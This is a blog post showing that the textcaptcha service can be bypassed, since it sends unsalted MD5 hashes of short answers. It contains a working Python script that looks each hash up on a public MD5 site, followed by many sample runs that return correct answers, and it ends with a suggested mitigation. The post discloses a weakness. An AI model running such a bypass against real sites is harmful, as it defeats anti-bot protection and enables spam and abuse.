Simple CAPTCHA issue

So a friend of mine is working on a CAPTCHA solving program. I can't go into the details here as it's not my work therefore it's not up to me to disclose.

This did peak my interest slightly as I was googling for examples for him to feed into his program, I came across "textcaptcha". The idea is simple, it ask's logical questions such as "How many colours in the list purple, penguin, blue, white and red?". The thought being that a computer wouldn't be able to understand the question.

My initial thought was that google would be smart enough to answer these. To my surprise it wasn't!

The way the software is used is that you pull down either a XML or JSON file from the URL which spits back the question and an MD5 hash of the answer. Here lies the problem.

Since it needs to be quick for users to answer it will generally be 1 word or number answers, and these are most likely already cracked and readily available to look up. So I created a small python script to test this:

#!/usr/bin/python
import httplib2

def find_between( s, first, last ):
try:
start = s.index( first ) + len( first )
end = s.index( last, start )
return s[start:end]
except ValueError:
return ""

print "[+] Getting Question & answer hash"
resp, content = httplib2.Http().request("http://api.textcaptcha.com/myemail@example.com.xml")
question = find_between(content, "<question>", "</question>")
print "[q]: "+question
qhash = find_between(content, "<answer>", "</answer>")
print "[h]: "+qhash
print "[+] Finding awnser"
h = httplib2.Http(disable_ssl_certificate_validation=True)
resp2, content2 = h.request("https://md5.gromweb.com/?md5="+qhash)
answer = find_between(content2, "<em class=\"long-content string\">", "</em>")
print "[=]: "+answer

And ran it a few hundred times. here's a small sample of the output:

root[~]: ./textcaptcha_cracker.py                                                                                                                                     
[+] Getting Question & answer hash                                                                                                                                    
[q]: Stomach, shorts, ant, shorts and ear: how many body parts in the list?                                                                                           
[h]: c81e728d9d4c2f636f067f89cc14862c                                                                                                                                 
[+] Finding awnser                                                                                                                                                    
[=]: 2                                                                                                                                                                
root[~]: ./textcaptcha_cracker.py                                                                                                                                     
[+] Getting Question & answer hash                                                                                                                                    
[q]: 13 minus four = ?                                                                                                                                                
[h]: 45c48cce2e2d7fbdea1afc51c7c6ad26                                                                                                                                 
[+] Finding awnser                                                                                                                                                    
[=]: 9                                                                                                                                                                
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash                                                                                                           
[q]: What is thirty nine thousand six hundred and forty five as a number?                                                                      
[h]: 42b6ab389c4620755da3fcafbaef3faa                                                                                                            
[+] Finding awnser                                                                                                                                  
[=]: 39645                                                                                                                                            
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash
[q]: Church, stomach, shorts, fruit, milk and shorts: how many body parts in the list?
[h]: c4ca4238a0b923820dcc509a6f75849b
[+] Finding awnser
[=]: 1
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash
[q]: The colour of a white mosquito is?
[h]: d508fe45cecaf653904a0e774084bb5c
[+] Finding awnser
[=]: white
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash
[q]: What is twenty two thousand seven hundred and sixty six as digits?
[h]: 5774b6bb3970f53874a09e9eec130980
[+] Finding awnser
[=]: 22766
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash
[q]: What number is 2nd in the series twenty six, eleven, seventeen, 38 and one?
[h]: 6512bd43d9caa6e02c990b0a82652dca
[+] Finding awnser
[=]: 11
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash
[q]: The brown chin is what colour?
[h]: 6ff47afa5dc7daa42cc705a03fca8a9b
[+] Finding awnser
[=]: brown
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash
[q]: Thirty seven, seventy eight, fourteen, 100, seven or 54: which of these is the biggest?
[h]: f899139df5e1059396431415e770c6dd
[+] Finding awnser
[=]: 100
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash
[q]: Which of ninety, sixty five, forty two, seventy six, 54 or forty nine is the highest?
[h]: 8613985ec49eb8f757ae6439e879bb2a
[+] Finding awnser
[=]: 90
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash
[q]: What is forty thousand one hundred and sixty as digits?
[h]: fcd6ee20a31612b7f2f886ed16348750
[+] Finding awnser
[=]: 40160
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash
[q]: Enter the number thirteen thousand eight hundred and fifty eight in digits:
[h]: 751d8d469b4f5508690047d65cbdac1b
[+] Finding awnser
[=]: 13858
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash
[q]: In the number 2252793, what is the 2nd digit?
[h]: c81e728d9d4c2f636f067f89cc14862c
[+] Finding awnser
[=]: 2
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash
[q]: Which of seventeen, 26, sixty, 55 or fifteen is the biggest?
[h]: 072b030ba126b2f4b2374f342be9ed44
[+] Finding awnser
[=]: 60

As you can see it seems to be pretty accurate.

I feel the only way to make this more secure would be to require the user to answer questions that require multiple words or phrases as these are less likely to have already been cracked and available to lookup. However this would hinder usability, but I'm not sure how much by.

Sharing is caring!

Leave a Reply